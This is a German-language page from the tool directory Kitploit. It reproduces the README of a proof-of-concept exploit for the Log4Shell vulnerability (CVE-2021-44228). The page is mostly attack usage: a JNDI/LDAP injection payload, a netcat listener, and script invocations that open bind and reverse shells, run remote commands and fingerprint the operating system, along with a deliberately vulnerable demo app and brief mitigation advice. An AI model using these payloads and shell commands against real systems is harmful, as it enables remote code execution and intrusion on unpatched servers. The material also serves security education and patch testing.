Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/thearqsz/cve-2021-44228-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Proof-of-concept Exploit für CVE-2021-44228 (Log4Shell) mit HTTP/LDAP-Servern, Unterstützung für Bind/Reverse-Shells, RCE, Betriebssystemerkennung und zeitbasierte Schwachstellenerkennung. Nur für Bildungszwecke.

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-44228 PoC

PoC für CVE-2021-44228.

Projekt nur für BILDUNGSZWECKE.

Exploit-Server

Dieses Projekt erstellt zwei Server: http und ldap. Beide sind notwendig, damit der Exploit funktioniert. Die angegebene Java-Datei wird kompiliert und die Server werden im Dockerfile gestartet. Der Payload wird dem Benutzer angezeigt – er muss an die verwundbare Anwendung übergeben werden.

Beispiel-Payload:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

Wie ausführen?

  • Bind-Shell
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Reverse-Shell
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Zeitbasierte Schwachstellenerkennung

Das Programm wird für 25 Sekunden in den Ruhezustand versetzt

root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
  • Betriebssystemerkennung
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444

Die Betriebssystemerkennung kann 4 Buchstaben zurückgeben:

  • L für Linux
  • W für Windows
  • M für macOS
  • U für unbekannt

Bypass

Bypass-Technik wurde veröffentlicht. Beispiel hier

Verwundbare Anwendung

Die App wurde entwickelt, um zu zeigen, wie sie funktioniert. Um das JAR mit einer App zu erstellen und auszuführen, verwenden Sie:

root@kitploit:~
./build_vuln_app.sh
java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'

wobei PAYLOAD vom Skript ./poc.sh zurückgegeben wird (z. B. ${jndi:ldap://127.0.0.1:1389/1}).

Danksagungen

Einige Danksagungen an Projekte und Websites, die bei der Erstellung dieses Exploits verwendet wurden:

  • https://github.com/shanfenglan/apache_log4j_poc
  • https://github.com/ivan-sincek/java-reverse-tcp
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/RandomRobbieBF/marshalsec-jar

Wie schützt man sich?

Starten Sie die App mit log4j und setzen Sie log4j2.formatMsgNoLookups auf true, oder aktualisieren Sie auf log4j-2.15.0-rc1 oder neuer. Updates sind in freier Wildbahn verfügbar – implementieren Sie sie so schnell wie möglich.

Haftungsausschluss

Dieses Projekt darf nur für Bildungszwecke verwendet werden. Die Nutzung dieser Software gegen Zielsysteme ohne vorherige Genehmigung ist illegal, und der Autor übernimmt keine Verantwortung für Schäden, die durch Missbrauch dieser Software entstehen.

Tool herunterladen